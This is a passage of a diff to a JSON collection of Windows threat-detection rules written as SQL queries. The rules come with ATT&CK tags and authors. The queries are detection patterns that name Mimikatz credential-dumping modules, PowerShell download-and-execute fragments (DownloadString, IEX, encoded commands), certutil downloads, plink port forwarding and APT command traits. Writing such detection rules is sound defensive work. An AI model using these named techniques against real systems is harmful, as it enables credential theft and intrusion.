NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": 
"proc_creation_win_plink_port_forwarding.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": 
"Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": 
"065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load 
of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", + "status": "test", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", "status": "test", - "description": "Detects 
SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "status": "experimental", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. 
startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": 
"proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. 
Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + }, + { + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. 
Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR 
OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((OriginalFileName = '3CXDesktopApp.exe' OR NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN 
('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": 
"proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "status": "experimental", + 
"description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1027" 
